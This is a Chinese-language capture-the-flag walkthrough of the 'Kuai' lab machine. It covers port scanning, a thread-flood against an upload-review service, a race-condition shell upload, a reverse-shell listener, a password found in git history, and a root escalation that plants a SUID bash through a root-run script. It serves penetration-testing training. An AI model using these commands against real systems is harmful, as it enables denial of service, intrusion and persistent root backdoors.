Kuai

靶机说明

• QQ群：660930334

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-24 15:16 CST
Nmap scan report for 192.168.2.1
Host is up (0.00092s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00085s latency).
MAC Address: 08:00:27:5C:1B:0E (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.29
Host is up (0.00082s latency).
MAC Address: 08:00:27:DB:04:74 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

靶机IP：192.168.2.29

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-24 15:16 CST
Nmap scan report for 192.168.2.29
Host is up (0.0012s latency).
Not shown: 65532 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp
MAC Address: 08:00:27:DB:04:74 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 48.85 seconds

开放端口：22、80、3000

2.详细信息扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80,3000 192.168.2.29
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-26 11:31 CST
Nmap scan report for 192.168.2.29
Host is up (0.00087s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp   open  http    Apache httpd 2.4.62 ((Debian))
|_http-server-header: Apache/2.4.62 (Debian)
|_http-title: Maze\xE4\xB8\x8A\xE4\xBC\xA0
3000/tcp open  ppp?
| fingerprint-strings: 
|   GetRequest: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.4 Python/3.9.2
|     Date: Fri, 26 Dec 2025 03:31:28 GMT
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 61
|     Connection: close
|     Upload Review server: Please use the API for operations(/api)
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     Server: Werkzeug/3.1.4 Python/3.9.2
|     Date: Fri, 26 Dec 2025 03:31:33 GMT
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|     Connection: close
|   Help: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request syntax ('HELP').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|     </html>
|   RTSPRequest: 
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|     "http://www.w3.org/TR/html4/strict.dtd">
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
|     <title>Error response</title>
|     </head>
|     <body>
|     <h1>Error response</h1>
|     <p>Error code: 400</p>
|     <p>Message: Bad request version ('RTSP/1.0').</p>
|     <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%I=7%D=12/26%Time=694E0191%P=x86_64-pc-linux-
MAC Address: 08:00:27:DB:04:74 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.04 seconds

二、WEB渗透

1、80端口

80端口是一个文件上传服务，上传后的文件需要经过审核服务器的审核，审核成功后才能成功进行上传

目录扫描

┌──(root㉿kali)-[/miaosec]
└─# dirsearch -u "http://192.168.2.29"                                   
Target: http://192.168.2.29/
[11:34:53] Starting: 
....
[11:35:54] 301 -  314B  - /uploads  ->  http://192.168.2.29/uploads/
[11:35:54] 200 -  488B  - /uploads/

Task Completed

目录/uploads是文件上传成功后的目录

2、3000端口

3000端口是文件上传审核服务，显示需要访问api

┌──(root㉿kali)-[/miaosec]
└─# curl http://192.168.2.29:3000
Upload Review server: Please use the API for operations(/api) 

访问api返回状态

┌──(root㉿kali)-[/miaosec]
└─# curl http://192.168.2.29:3000/api
{"status":"ok"}

3、文件上传利用

因此渗透思路：尝试DDos3000端口的服务，使文件审核服务失效

1. DDos3000端口服务
   直接使用gobuster进行目录扫描，模拟DDoS攻击，设置速率-t=1000

   ┌──(root㉿kali)-[/miaosec/ddos]
   └─# gobuster dir -u http://192.168.2.29:3000/api -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 10000  

2. 进行文件上传，利用条件竞争的方式，使用burp重复发送数据包
   

3. 成功上传shell
   

三、获取到www-data权限

成功获取到shell

┌──(root㉿kali)-[/miaosec]
└─# nc -lvnp 4444                                                 
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.29] 59000
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

稳定shell

script /dev/null -c bash
ctrl+z
stty raw -echo; fg
reset
xterm

四、权限提升

1、获取tuf权限

发现在/opt目录下面存在.git泄露

www-data@Kuai:/var/www/html$ ls -la /opt
total 16
drwxr-xr-x  3 root root 4096 Dec 23 05:12 .
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
drwxr-xr-x  8 root root 4096 Dec 23 05:13 .git
-rw-r--r--  1 root root  308 Dec 23 05:12 app.py

使用git log查看项目提交历史记录

www-data@Kuai:/opt$ git log   
fatal: detected dubious ownership in repository at '/opt'
To add an exception for this directory, call:

        git config --global --add safe.directory /opt
www-data@Kuai:/opt$ git config --global --add safe.directory /opt
fatal: $HOME not set
www-data@Kuai:/opt$ export HOME=/tmp 
www-data@Kuai:/opt$ git config --global --add safe.directory /opt

www-data@Kuai:/opt$ git log                                      
WARNING: terminal is not fully functional
-  (press RETURN)commit 937ff3b9ba793ab8e772dc5203f1170629cdfedf (HEAD -> master)
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:13:09 2025 -0500

    a

commit f268d01060bba2e565791d8127eb88d28d546e0d
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:12:32 2025 -0500

    1

commit 5c37bb88686b9013c6834f0b307a27654664e734
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:11:52 2025 -0500

    1

查看git对象提交的详细信息

www-data@Kuai:/opt$ git show f268d01060bba2e565791d8127eb88d28d546e0d
WARNING: terminal is not fully functional
-  (press RETURN)commit f268d01060bba2e565791d8127eb88d28d546e0d
Author: Your Name <you@example.com>
Date:   Tue Dec 23 05:12:32 2025 -0500

    1

diff --git a/app.py b/app.py
index 61c33fe..612613f 100644
--- a/app.py
+++ b/app.py
@@ -2,10 +2,12 @@
 from flask import Flask, jsonify
 
 app = Flask(__name__)
+// tuf: Cbr5Cq1QBS2GHUOGuJrc
 
 @app.route('/')
 def index():
     return '<E8><AF><B7><E9><80><9A><E8><BF><87>API<E6><93><8D><E4><BD><9C>'
+    
 
 @app.route('/api', methods=['GET', 'POST'])
 def api():

找到用户名和密码tuf: Cbr5Cq1QBS2GHUOGuJrc

┌──(root㉿kali)-[~]
└─# ssh tuf@192.168.2.29
tuf@192.168.2.29's password: 
tuf@Kuai:~$ id
uid=1000(tuf) gid=1000(tuf) groups=1000(tuf)

2、获取root权限

查看运行的进程，app.py以root的权限运行着，而app.py又属于tuf的/home目录

tuf@Kuai:~$ ps -anux | grep app.py
       0     401  0.0  0.0   2472   572 ?        Ss   20:30   0:00 /bin/sh -c python3 /home/tuf/app.py
       0     403 16.2  1.9 605004 40660 ?        S    20:30   5:24 python3 /home/tuf/app.py

替换app.py即可

tuf@Kuai:~$ mv app.py app.py.bak
tuf@Kuai:~$ vi app.py
tuf@Kuai:~$ cat app.py
import os 

os.system('chmod +s /bin/bash')

/bin/bash具有suid权限

tuf@Kuai:~$ ls -la /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

成功获取到root权限

tuf@Kuai:~$ bash -p
bash-5.0# id
uid=1000(tuf) gid=1000(tuf) euid=0(root) egid=0(root) groups=0(root),1000(tuf)

五、获取FLAG

bash-5.0# cat /root/root.txt /home/tuf/user.txt
flag{root-95018486b629352b77c99094f3b9ecac}
flag{user-a6ecaaa0bbecc2c0f772206395a5d33d}